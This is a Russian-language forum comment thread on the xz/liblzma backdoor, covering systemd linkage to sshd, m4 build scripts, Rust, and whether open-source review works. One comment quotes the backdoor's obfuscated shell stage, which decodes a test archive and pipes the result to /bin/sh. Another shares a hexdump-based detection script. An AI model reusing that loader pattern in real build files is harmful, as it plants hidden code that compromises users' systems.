  • 9.349, n00by (ok), 08:31, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Я вижу, ты не в курсе, что Освальд перед тем попросил политическое убежище в ССС... текст свёрнут, показать
     
  • 7.274, Аноним (270), 13:54, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > Сноуден сам пошёл в контору. Взрослый мужчина, не мог не знать, какого рода делами занимается контора. То есть сам изъявил желание поучаствовать.

    Контора занимался незаконной деятельностью за пределами сша. Это его устраивало. Потом она начала заниматься незаконной деятельностью на территории сша. Против своих граждан. Он решил помещать как может.
    Так сложно это понять?
    Если бы они не начали по своим работать шиш бы он куда сбежал. Так бы радостно и работал на страну.

     
     
  • 8.378, n00by (ok), 17:44, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Так ты Патриотический Акт почитай Может последуешь примеру своего кумира и пере... текст свёрнут, показать
     
     
  • 9.384, Аноним (382), 20:58, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Так кто прав Американский суд признавший преступным слежку за своими гражданами... текст свёрнут, показать
     
     
  • 10.397, n00by (ok), 07:49, 01/04/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Зачем ты задаёшь мне все эти глупые вопросы Ты хочешь меня убедить, что я не пр... текст свёрнут, показать
     
  • 4.153, Аноним (159), 10:49, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    То самое анб что протолкнуло свою поделку вместо рсбак и пах-грсек? Хотя они были уже готовы. А потом в анб признали ошибку и переписали кусок с лсм? https://www.rsbac.org/documentation/why_rsbac_does_not_use_lsm
     

     ....большая нить свёрнута, показать (40)

  • 1.70, Аноним (68), 01:44, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +9 +/
    Надо было xz на расте писать, с его наркохипанским синтаксисом никто ничего никогда бы не нашёл.
     
     
  • 2.187, Аноним (248), 11:29, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +6 +/
    > на расте писать, с его наркохипанским синтаксисом никто ничего никогда бы не нашёл.

    То есть синтаксис m4 портянки из новости тебя не смутил, да?

     
     
  • 3.366, Аноним (364), 16:30, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Так даже у m4 синтаксис лучше чем у Раста.
     
  • 2.265, Аноним (-), 13:38, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Это хорошо что вы открыто говорите о своих проблемах.
    Ну не удалось вам понять как работают лайфтаймы в Расте, ну что поделаешь, бывает.
    Многие даже Си осилить не могут, так до сих пор и ходят [под себя] за пределы буфера.
     

  • 1.74, Лутту (?), 01:51, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    m4???

    Невероятно.

     
     
  • 2.154, Аннон (?), 10:49, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +4 +/
    Ещё одно доказательство, что Automake место на свалке. Не читаемый набор скриптов, который невозможно отревьювить
     
     
  • 3.292, Аноним (292), 15:44, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Если скрипты намеренно не читать, их и нельзя будет отревьюить.
     

  • 1.76, Oe (?), 01:54, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • –2 +/
    Какого черта какой то ноунейм liblzma либе доступно чтение и запись в любую область памяти sshd? Это безопасность линукс такая? Ей богу лучше бы javascript использовали пользы было бы больше чем на сях писать.
     
     
  • 2.137, Аноним (125), 10:15, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Иди сурсы читай. sshd напрямую эту библиотеку и не использует, просто какие-то гении присобачили к sshd systemd, а эта хрень уже тащит с собой чуть ли не весь интернет в зависимости. Просто sshd тут оказался апетитной добычей, а так по-факту под контроль можно взять всю твою систему, если подменить при линковке нужные функции уже в самом systemd.
     
     
  • 3.219, Oe (?), 12:24, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • –5 +/
    Вопрос по прежнему открыт: почему ноунейм прилинкованная либа имеет доступ к памяти sshd? Почему в 2024 году память sshd не зашифрована аппаратно? По логике любой либе скармливаются входные данные и она отдает выходные, ни в какие иные области памяти она читать и тем более писать не имеет право. До вас еще не дошло, что вся эта десктопная архитектура и код под неё мертв и не обеспечивает должной безопасности? Это детские баги уровня виндоус 95
     
     
  • 4.243, Аноним (243), 13:11, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > По логике любой либе скармливаются входные данные

    в виде указателя на область памяти... Ты представляешь производительность того же хрома, который на каждый библиотечный вызов будет сериализовать нагрузку и передавать ее через какой-то спец интерфейс?

     
     
  • 5.273, n00by (ok), 13:51, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > будет сериализовать нагрузку

    А я предлагаю наконец научиться кодить, почитать про mmap, например.

     
  • 4.322, Аноним (322), 18:59, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >Почему в 2024 году память sshd не зашифрована аппаратно?

    Так и запишем - пособник копирастов-тивоизастов и устаревастов.

     
  • 4.358, Легивон (?), 10:26, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >ноунейм прилинкованная либа имеет доступ к памяти sshd?

    Иди книжку почитай: как работает линковка и для чего она нужна.

     
  • 4.405, Аноним (317), 14:43, 01/04/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Это претензии к операционным системам, я надеюсь, а не к разработчикам прикладно... большой текст свёрнут, показать
     
  • 2.158, n00by (ok), 10:54, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Ловите его скорее, а то он и NIH-синдром поставит под сомнение! ;)
     

  • 1.81, soarin (ok), 03:34, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    brew upgrade
    xz 5.6.1 -> 5.4.6

    https://github.com/Homebrew/homebrew-core/pull/167512

     
  • 1.87, Аноним (87), 04:14, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    > This repository has been disabled.

    Посжимали и хватит. F

     
  • 1.88, Аноним (88), 05:08, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    >патч для поддержки systemd-notify, приводящий к связыванию sshd к liblzma

    Я так понимаю, что если был любой другой инит, а не системда + патч, то этот бекдор не проблема? Сами дураки, поставили инит в котором пропатчив один из модулей подвергают атаке все сразу.

     
     
  • 2.90, glad_valakas (?), 05:23, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    вот devuan, какой-то рудимент от systemd имеется S ldd usr sbin sshd l... большой текст свёрнут, показать
     
     
  • 3.113, Аноним (48), 09:15, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Сколько же там дерьма напихано, фу. Правильное у меня мнение было об этом дистре. Вот в генту без лишнего

    ldd /usr/sbin/sshd
            linux-vdso.so.1 (0x00007ffe63093000)
            libcrypt.so.2 => /usr/lib64/libcrypt.so.2 (0x00007f787309d000)
            libcrypto.so.3 => /usr/lib64/libcrypto.so.3 (0x00007f7872a00000)
            libz.so.1 => /usr/lib64/libz.so.1 (0x00007f7873083000)
            libc.so.6 => /lib64/libc.so.6 (0x00007f7872824000)
            /lib64/ld-linux-x86-64.so.2 (0x00007f78731e9000)

     
     
  • 4.196, Аноним (196), 11:42, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    В Debian ldd usr bin ssh linux-vdso so 1 0x00007ffd6d9fb000 libselinux so ... большой текст свёрнут, показать
     
     
  • 5.244, Аноним (243), 13:13, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    так разговор про sshd,а не про ssh
     
  • 4.242, НяшМяш (ok), 13:09, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Даже в арче не додумались до такого ldd usr sbin sshd linux-vdso so 1 ... большой текст свёрнут, показать
     
     
  • 5.362, Аноним (362), 12:20, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    В арче не принято обмазывать исходники пакетов коричневой субстанцией^W^W патчами, как в дебиане
     
  • 3.225, нах. (?), 12:42, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > вот devuan, какой-то рудимент от systemd имеется:

    Это не рудимент, это весь systemd и есть. С чем и поздравляю борцунов с системдрянью не умеющих кодить.

    Но ты можешь не переживать - твой локалхост не подвержен уязвимости, поскольку является клоном де6иллиана, супергероя, успешно защищающего мир от слишком нового софта. Два года назад? Птьфу, это не слишком новый, это вообще гость из будущего.... для де6иллиана - довольно далекого.

    А пользуемые федорой пусть страдают, страдание очищает.

     
     
  • 4.279, glad_valakas (-), 14:15, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    >> вот devuan, какой-то рудимент от systemd имеется:
    > Это не рудимент, это весь systemd и есть.

    чушь.
    1) процесса systemd нет.
    2) сравни с нормальным дебианом:
    ldd /lib/x86_64-linux-gnu/libsystemd.so.0
            linux-vdso.so.1 (0x00007ffcf25f3000)
            libcap.so.2 => /lib/x86_64-linux-gnu/libcap.so.2 (0x00007f59e532f000)
            libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007f59e532a000)
            libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f59e5149000)
            /lib64/ld-linux-x86-64.so.2 (0x00007f59e53fb000)

     
  • 2.91, Аноним (91), 05:24, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Да
     

  • 1.89, Аноним (89), 05:20, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +3 +/
    А сколько таких, которые не попались?!
     
     
  • 2.93, BrainFucker (ok), 06:33, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    А я-то думаю чего с годами потребление памяти и другая требовательность к ресурсам растёт даже у консольных утилит...
     
     
  • 3.166, Аноним (166), 11:14, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Так их переписывают просто. То на Питончик, то на Раст...
     

  • 1.92, Аноним (92), 05:38, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +3 +/
    a/xz-5.6.1-x86_64-2.txz: Rebuilt.
           Seems like a good idea to build this from a git pull rather than the signed
           release tarballs. :-)
           The liblzma in the previous packages were not found to be vulnerable by the
           detection script, but I'd rather not carry the bad m4 files in our sources.
           Here's a test script for anyone wanting to try it:
           if hexdump -ve '1/1 "%.2x"' /lib*/liblzma.so.5 | grep -q f30f1efa554889f54c89ce5389fb81e7000000804883ec28488954241848894c2410 ; then
           echo probably vulnerable
           else
           echo probably not vulnerable
           fi

    Вот вам код для проверки от Патрика.

     
  • 1.97, Аноним (98), 07:51, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +5 +/
    > в прошлом году Jia Tan внёс изменения, несовместимые с режимом проверки "-fsanitize=address", что привело к его отключению при fuzzing-тестировании.

    Вот! В этом месте и надо отлавливать вредителей.

    Ещё одно место это JIT код который не собирается с -fPIE надо искоренить.

     
  • 1.99, iCat (ok), 07:57, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    libsystemd
    Для меня это уже повод насторожиться
     
     
  • 2.103, Аноним (98), 08:07, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    А для меня расслабится. Использую дистр без сысды, дбас, полкитды, вяленого.
     
     
  • 3.284, Аноним (281), 14:32, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Расслабился - смой за собой
     
     
  • 4.294, Аноним (292), 15:47, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Так он же сказал:
    >Использую дистр без сысды, дбас, полкитды, вяленого.
     

  • 1.102, вася (??), 08:04, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Интересно, на сколько лет посадят писателя этого бэкдора?
     
     
  • 2.104, Вова (?), 08:12, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Закон дышло, чужого - посадим, своего - наградим: https://tass.ru/obschestvo/17021313

    "действующие в интересах РФ на ее территории и за рубежом, должны быть освобождены от ответственности, этот вопрос планируется проработать"

    У них тоже, наверно так. Распространявшего бекдор в интересах спецслужбы непосадят. Он же не шпион, а разведчик.

     
     
  • 3.107, Sw00p aka Jerom (?), 08:35, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    >Он же не

    ну да, прям как, чтобы ликвидировать кучку ТТ, надо было потравить тучу хостейдж, ага медальку дайте.

     
  • 2.210, Аноним (248), 12:04, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > Интересно, на сколько лет посадят писателя этого бэкдора?

    Ни на сколько, потому что в лицензии либы есть отказ от каких либо обязательств.

     
  • 2.227, нах. (?), 12:44, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Кто ж посадит действующего члена КПК?

    Судя по имячку - он прям оттуда и кодил.

     

  • 1.109, Аноним (106), 08:40, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Хомы начинают прозревать, а вдруг не все выходы за границы буфера это просто ошибка? И никакой р-ст не спасёт от злонамеренного использования.
     
  • 1.111, Аноним (-), 09:09, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • –7 +/
    Какой позор для опенсорса...
    Внезапно оказалось, что открытый код и контролируемые репозитории не спасают от бекдоров...
    У фанатиков срочный перерыв на переписывание методичек))
     
     
  • 2.134, Аноним (121), 10:13, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Так бекдор, внезапно, в бинарнике! Вот тебе и закрытый код.
     
     
  • 3.175, n00by (ok), 11:21, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Бэкдор в библиотеке с открытым кодом. Ты думал, что его ещё и прокомментируют в исходнике? Что бы можно было делать

    grep -R B4CKD0R *

    ?

     
     
  • 4.306, Аноним (121), 16:15, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Ты точно читал новость? Архивы давно перестали быть бинарными файлами?

    При сборке в ходе выполнения запутанных обфусцированных операций на основе архивов bad-3-corrupt_lzma2.xz и good-large_compressed.lzma, добавленных под предлогом использования в тестах корректности работы распаковщика, формировался объектный файл с вредоносным кодом, который включался в состав библиотеки liblzma и изменял логику работы некоторых её функций.

     
     
  • 5.342, Аноним (342), 23:31, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Бэкдор не в коде программы, а в её сборочных скриптах. Это определенно всё меняет.
     
  • 5.353, n00by (ok), 08:53, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Я не только читал новость, но и краем уха слышал, чем полиморфные движки отличаются от метаморфных. А ты не только сейчас полезешь гуглить эти слова, но и моё сообщение для тебя оказалось недостаточно понятным. Попробую упростить: никто не принесёт тебе бэкдор на блюдечке.
     
     
  • 6.367, Аноним (364), 16:45, 31/03/2024 Скрыто ботом-модератором     [к модератору]
  • +/
     
     
  • 7.398, n00by (ok), 08:09, 01/04/2024 Скрыто ботом-модератором     [к модератору]
  • +/
     
  • 6.418, Аноним (417), 11:09, 26/04/2024 Скрыто ботом-модератором     [к модератору]
  • +/
     
     
  • 7.419, n00by (ok), 08:53, 28/04/2024 Скрыто ботом-модератором     [к модератору]
  • +/
     
  • 2.192, Аноним (248), 11:36, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +3 +/
    > Внезапно оказалось, что открытый код и контролируемые репозитории не спасают от бекдоров...

    Ты с логикой дружишь? Бэкдор найден через месяц после внедрения, в репе по комитам нашли автора.

    А теперь представь, что было бы при подобной ситауции в проприетари.

     
     
  • 3.307, Аноним (121), 16:18, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +3 +/
    > А теперь представь, что было бы при подобной ситауции в проприетари.

    А ничего бы не было, в Cisco до сих пор не расказали, кто на наоставлял вагон бекдоров, несмотря на все скандалы (но запретили Huawei, что иронично).

     

  • 1.123, Аноним (123), 09:51, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +4 +/
    >Код активации бэкдора был спрятан в m4-макросах из файла build-to-host.m4

    Не удивлюсь, если во всех проектах на automake, включая rpm и firejail, такое происходит. Потому что automake - это специальное говно, к которому никто прикасаться и даже смотреть не будет. А те, кто упорствует в своей ереси по использованию automake - пособники бэкдорщиков.

     
     
  • 2.296, Аноним (292), 15:49, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • –1 +/
    В ninja тем более смотреть не будет никто. А в automake очень даже.
     
     
  • 3.325, Анонми (?), 20:09, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > В ninja тем более смотреть не будет никто. А в automake очень даже.

    Makefile для ninja никто руками не пишет, и, соответственно, не заливает в репы/тарболы. Они генерятся тулзами типа meson и CMake.

     
     
  • 4.334, Аноним (334), 22:27, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Очень даже пишут. Иногда. В очень нишевых кейсах. Они даже читаемыми получаются. Главные их проблемы - гвоздями прибиты к компилятору, флагам и окружению.
     

  • 1.124, Аноним (123), 09:53, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    >Активирующие бэкдор m4-макросы входили в состав tar-архивов релизов, но отсутствовали в Git-репозитории.

    Но идиотские дистры вроде Дебиана продолжат собирарь из архивов.

     
     
  • 2.193, Аноним (248), 11:38, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > Но идиотские дистры вроде Дебиана продолжат собирарь из архивов.

    Ага, а надо из апстрим репы исходного кода, да прямо из master ветки...

     
     
  • 3.230, Аноним (230), 12:48, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +2 +/
    man git-checkout
     
  • 3.275, n00by (ok), 13:58, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >> Но идиотские дистры вроде Дебиана продолжат собирарь из архивов.
    > Ага, а надо из апстрим репы исходного кода, да прямо из master
    > ветки...

    Расскажи, в каком дистрибутиве ты собираешь пакетики. Страна должна знать своих героев.

     
  • 2.195, Аноним (195), 11:40, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Fedora, OpenSUSE тоже идиотские дистрибутивы?)
     
     
  • 3.228, Аноним (230), 12:47, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Эти - особенно.
     

  • 1.126, сщта (?), 10:06, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Так это в Сид каком-нибудь только прилетело,навряд ли в обычный Дебиан попало.
     
  • 1.128, Аноним (-), 10:08, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +3 +/
    Эта либа себя дискредитировала.
    Jia Tan коммитил в течение для двух лет и любой из этих коммитов не вызывает доверия.
    Нужна замена. Более надежная. Например написанная на расте.
     
     
  • 2.130, Аноним (166), 10:09, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    В расте и обфусцировать бэкдор не надо будет - в коде просто никто и так не разберётся...
     
     
  • 3.132, Аноним (106), 10:11, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Код уже написан и уже внедрен в какой-то мутный драйвер из 100 строк.
     
  • 3.139, Аноним (-), 10:17, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +2 +/
    В расте нет такого древнего легаси как m4 скрипты.
    Там нормальная человекочитаемая система сборки.

    > в коде просто никто и так не разберётся

    Не судите, пожалуйста, по себе. Если вы неосилятор, это не значит всё тоже неосиляторы.
    Кто захочет - тот в разберется в коде.

     
     
  • 4.183, Аноним (106), 11:27, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Ты хотел сказать что на рсте вообще нет никакого продакшн кода.
     
     
  • 5.247, НяшМяш (ok), 13:14, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Гугл с андроидом и не в курсе. И ещё с десяток крупных компаний.
     
     
  • 6.308, Аноним (106), 16:44, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Это все происходит только в твоём воображении и каких то маловнятных новостях. Которые копнуть глубже и ясно что новость пшик.
     
  • 4.297, Аноним (292), 15:52, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >Там нормальная человекочитаемая система сборки.

    Тянущая всё с гитхабчика, ага. Ночью по CET/PST дядя Ляо сделал git push, дядя Ли запустил сборку растопакетика, маякнул Ляо сделать git push --force с отменой коммита и всё шито-крыто.

     
  • 4.321, Аноним (321), 18:55, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >Там нормальная человекочитаемая система сборки

    ...
    1. сама тянущая все зависимости, какие укажут разработчики пакетов укажут. и собирающая их -> гигантское дерево зависимостей совершенно произвольных версий, прибытых гвоздями, в нескольких экземпларах, и зачастую совершенно не нужных для программы, просто где-то указанных в зависимостях, а не пакетов из дистра. Не нравится - перепиши всю экосистему.
    2. выполняющая произвольный код вов время сборки, какой разработчик любой зависимости укажет -> компрометация сборочной системы с инфицированием всего софта, на ней собираемого
    3. статическая линковка —> огроменные жрущие бинари, в которых невозможно разобраться, проще выкинуть.

     
  • 4.368, Аноним (364), 16:50, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Кто захочет писать безопасно на Си - тот будет писать безопасно на Си.
    Неосиляторам же ничто не поможет, даже новый язык.
     
  • 4.373, jsforever (ok), 17:26, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Не переживай, раст и прочая скриптуха также подвержена подобным проблемам. И дело не в синтаксисе, а в макросне. Любая макросня - это уже обфускация.
     
  • 3.157, Аноним (-), 10:54, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • –1 +/
    В расте не смогут разобраться только неосиляторы.
    Там гугл переучивает разработчиков которые писали на Го (на ГО, Карл!) и они осваивают раст за 2-3 месяца.
    И пишут нормальный код.

    Зато в расте не будет отстоя тим м4 и пробашпортянок.

     
     
  • 4.194, Аноним (195), 11:38, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Умник, ты хоть посмотри для чего использовался bash. Или ты из очередных "не читал, но осуждаю"?
     
  • 4.369, Аноним (364), 16:52, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Использование Хруста как-то мешает использовать в проекте m4 и bash? Выдыхай, бобер.
     
  • 4.374, jsforever (ok), 17:28, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Там уже есть весь этот отстой - это макросы. Проблемы всё те же, что и у баш/м4.
     
  • 2.341, microcoder (ok), 23:26, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    На Питоне замучаешься обфуцировать. Вот это язык так язык! Хех-хех )))))
     

  • 1.136, Анонм (?), 10:14, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +5 +/
    m4-макрос, дата редиза - 1977 год
    Конечно использовать инструменты полувековой давно так безопасно!

    Которые в последствии порождают (хотя честнее сказать высрыают) баш портянку такого вида



    export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh-dc|/bin/sh


    Да за такой код, без комментариев "чего оно делает", нужно просто закрывать ПР без разговоров.
    Хотя я вообще сомневаюсь, что этот кал кто-то читал.

     
     
  • 2.231, нах. (?), 12:50, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > Конечно использовать инструменты полувековой давно так безопасно!

    если ты не можешь прочитать простенький код на m4 - каковы твои шансы что-то заметить в кодомусорке для модных систем сборки на десяти нескучных языках?

    А если просто не хочешь - то хоть на чем пиши.

     
  • 2.299, Аноним (292), 15:55, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    >Которые в последствии порождают (хотя честнее сказать высрыают) баш портянку такого вида

    Так ты не порождай.

    >Да за такой код, без комментариев "чего оно делает", нужно просто закрывать ПР без разговоров.

    Ты часом не питонист?

     
     
  • 3.319, Аноним (319), 18:49, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    И питонист, и сторонник Дяди Боба. А вы можете продолжать знать только JavaScript.
     

  • 1.138, Аноним (166), 10:16, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Тысячи глаз!
     
     
  • 2.143, сщта (?), 10:20, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Бывают и злые Васяны,ничего тут не сделаешь. Вон в Кеды тоже свину подложили и нчё всем нравится. Зато не Винда.
     
  • 2.150, sqrt (?), 10:32, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +8 +/
    Как раз эти пресловутые "тысячи глаз" и сработали. Поймал не человек, занимающийся безопасностью специально, а опытный и любознательный пользователь, который заметил подтормаживания. Бэкдор был в сборочных скриптах, которые, в случае проприетарщины, были бы ни в каком виде не доступны.

    Если и искать пример для опровержения принципа "тысячи глаз" — надо брать какой-нибудь heartbleed или log4j, хотя там бекдорственность не так очевидно, скорее просто некачественный код.

     
     
  • 3.164, Аноним (159), 11:09, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • –3 +/
    Сработали???
    Ни один из копавшихся в исходниках этого не нашёл за два года. Эстонские глаза что ли?
     
     
  • 4.178, Аноним (123), 11:24, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    5.6.0 Mon, 26 Feb 2024 07:47:01 +0100 - из чейнджлога Debian Sid. Где тут 2 года?
     
     
  • 5.212, Аноним (205), 12:07, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Почти год назад он отключил это.
    ifunc is not compatible with -fsanitize=address, so this should be disabled for fuzzing builds.
    Два года как он коммитит в этот проект.
    Зачем ты мне ченджлоги дебиан сид подбрасываешь? Мы про сам проект и тыщи глаз разговариваем.
     
     
  • 6.278, Аноним (246), 14:12, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Там была проведена многолетняя подготовка к внедрению бэкдора. Легендирование и всё такое, чем спецслужбы играются. Как видим не особо помогло - спустя ~месяц годы трудов псу под хвост пустили. Хотя я уверен, что всех, ради кого бекдор внедряли, уже поломали.
     
     
  • 7.285, Аноним (285), 14:45, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Так они только играются. Возьми несколько летней давности историю с университетом миннесоты. Сравни насколько схема была примитивней чем здесь. Здесь они даже пытались устранить последствия косяка из-за которого их могли заметить выпустив новую версию. Случайно человек заинтересовался почему сбои и случайно вышел на бэкдор. Этого могло и не быть.
    Возможно это просто очередной тестовый проект как внедрять бэкдоры. Работают начиная от технической части и заканчивая социальной.
    Дальше они наберут статистику и получат какими действиями, какими технологиями, за какое время посадить бэкдор с определённой вероятностью на срок ХХ лет.
     
     
  • 8.293, Аноним (293), 15:44, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Ненадёжно Бэкдор в программе можно выпилить А вот бэкдор в спецификации или эк... текст свёрнут, показать
     
  • 4.180, Аноним (106), 11:25, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    А в проприетарных типа всё всегда находится? Ты это, переставай употреблять!
     
     
  • 5.188, Аноним (-), 11:30, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > А в проприетарных типа всё всегда находится?

    А какая нам разница что там у проприетарных?
    И почему тебя это вообще беспокоит?
    Ты что виндузятник? Или вообще маковод??

     
     
  • 6.309, Аноним (106), 16:47, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    В том что метод тысячи глаз работает и сработал. То что у него есть время реакции ненулевое так это у всего в этом мире так. А в проприетари уязвимости бай дизайн и даже такие каких производитель не закладывал.
     
     
  • 7.340, Аноним (340), 23:20, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Двойные стандарты что бы защитить свой мирок Понимаю Там нашли бэкдор и опубли... большой текст свёрнут, показать
     
  • 2.151, Аноним (-), 10:39, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Не, тут к сожалению не только это Чел сначала предложил коммит с отключением фа... большой текст свёрнут, показать
     

  • 1.145, zeecape (ok), 10:27, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +3 +/
    "GitHub полностью заблокировал репозитории xz, xz-java и xz-embedded, которые теперь недоступны для анализа и загрузки прошлых версий"
    Microsoft: Какой эксплойт? Вам просто показалось! ("Незаметно" убрали эксплойт)
     
     
  • 2.232, нах. (?), 12:52, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +2 +/
    не только эксплойт но и доступ к версиям, вредительских правок еще не содержавших.

    (впрочем, да, один forced push и наша супер система по подделке истории комитов отлично себя оправдает. Может, кстати, потому и заблокировали.)

     

  • 1.149, Анонм (-), 10:32, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    > Кроме того, в прошлом году Jia Tan внёс изменения, несовместимые с режимом проверки "-fsanitize=address", что привело к его отключению при fuzzing-тестировании.

    Хахаха, а теперь расскажите мне, как в (типа) серьезных проектах используют автотесты, санитайзеры и фаззинг.
